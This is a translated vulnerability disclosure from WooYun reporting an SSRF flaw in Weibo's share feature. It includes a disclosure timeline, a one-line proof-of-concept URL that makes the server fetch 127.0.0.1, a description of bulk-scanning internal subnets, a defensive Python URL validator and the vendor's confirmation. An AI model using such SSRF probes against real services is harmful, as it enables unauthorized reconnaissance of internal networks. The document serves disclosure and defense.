2014-05-21: Details reported to the vendor; awaiting vendor handling
2014-05-21: Vendor has confirmed; details disclosed to the vendor only
2014-05-31: Details disclosed to core white hats and experts in the relevant field
2014-06-10: Details disclosed to regular white hats
2014-06-20: Details disclosed to intern white hats
2014-07-05: Details disclosed to the public
As the title says!
Details: see the earlier trick:
WooYun: Intranet Weaver: rapidly weaving a Chinese search engine's internal network
With some attention to detail, a single SSRF vulnerability is enough to map out the internal network structure of a large company in short order. (For an ordinary small application this would hardly count as a vulnerability, but for an application sitting in front of a large network it is a different matter: this is a landmark class of bug, because it tears straight through the network boundary. It looks minor, yet it is very effective. The impact is not limited to the HTTP protocol, nor to implementation flaws in this kind of feature; other vulnerabilities can also be turned into SSRF. It may well lead the next wave of web vulnerabilities.)
In this case, a flaw in the implementation of the share feature allows requests to the internal network where the application itself is hosted.
Quick verification: make the application fetch its own server:
http://service.weibo.com/share/share.php?url=http://127.0.0.1:80

Combined with a small tool this can be done in bulk (a few live subnets picked at random, scanned for applications on ports 80 and 8080):

The intranet structure is visible at a glance!
Restrict requests to the internal network!
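What that restriction looks like in practice for a share or link-preview endpoint, as an added example that is not part of the original report or of Weibo's code: the URL is parsed and its host resolved before any request is made, and any target that maps to a non-global address is refused. `check_share_url`, `_is_internal` and the injectable resolver are hypothetical names chosen for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example (hypothetical check_share_url): resolve the target host BEFORE
# any request and require every address it maps to be globally routable, which
# rejects loopback, RFC 1918 (10/8, 172.16/12, 192.168/16), link-local, etc.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}          # a share preview has no business on 8080 etc.

def _system_resolver(host):
    """Every A/AAAA address for host via the OS resolver (handles IP literals)."""
    return [ai[4][0] for ai in socket.getaddrinfo(host, None)]

def _is_internal(ip_str):
    ip = ipaddress.ip_address(ip_str)            # ValueError on garbage
    return not ip.is_global or ip.is_multicast

def check_share_url(url, resolver=_system_resolver):
    """Return (allowed, reason, addresses); on success connect to one of
    `addresses` directly (Host = original name), never re-resolve (DNS rebinding)."""
    try:
        parts = urlsplit(url)                     # ValueError on malformed input
        port = parts.port                         # ValueError on a bad port
    except ValueError:
        return False, "malformed URL or port", []
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", []
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL", []
    host = parts.hostname
    if not host:
        return False, "missing host", []
    port = port if port is not None else (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port, []
    try:
        addresses = sorted(set(resolver(host)))
    except OSError:                               # socket.gaierror is an OSError
        return False, "host does not resolve", []
    if not addresses:
        return False, "host does not resolve", []
    for addr in addresses:                        # one internal address rejects all
        try:
            if _is_internal(addr):
                return False, "resolves to internal address %s" % addr, []
        except ValueError:
            return False, "unparseable address %s" % addr, []
    return True, "ok", addresses
```

The returned address list is the part most implementations skip: the fetch must go to the vetted address with the Host header set to the original name, otherwise a second lookup at connect time can hand back an internal address.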
Copyright notice: please credit the source 路人甲@乌云 when reposting.
Vulnerability response
Vendor response: Severity: High
Vulnerability Rank: 10
Confirmed: 2014-05-21 16:57
Vendor reply: Thank you for your attention to Sina security; please notify the relevant staff to handle it.
Latest status: none